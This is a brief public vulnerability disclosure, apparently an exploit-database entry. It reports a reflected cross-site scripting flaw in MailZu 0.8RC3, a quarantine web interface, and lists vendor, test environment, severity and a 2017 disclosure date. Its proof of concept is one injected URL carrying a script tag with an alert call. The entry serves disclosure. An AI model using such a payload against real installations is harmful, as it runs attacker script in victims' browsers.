[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
[+]###################################################################################################
 
 
 
Vendor:
===============
https://sourceforge.net/
 
 
Product:
===============
0.8RC3
 
 
Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/
 
 
MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages.
 
 
Vulnerability Type:
======================================
Reflected Cross Site Scripting.
 
 
 
CVE Reference:
===============
N/A
 

 
 
Tested on:
=============== 
Windows 7
Apache/2.4.23 (Win64)

 
 
 
Exploit/POC:
============
 
1) navigate the server http://server/index.php
 
 
2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script>
 
 
3) Done!
 
 
 
Network Access:
===============
Remote
 
 
 
Impact:
=================
Execute malicious scripts
 
 
 
Severity:
===========
High
 
 
Disclosure Timeline:
=====================
January 18, 2017 : Public Disclosure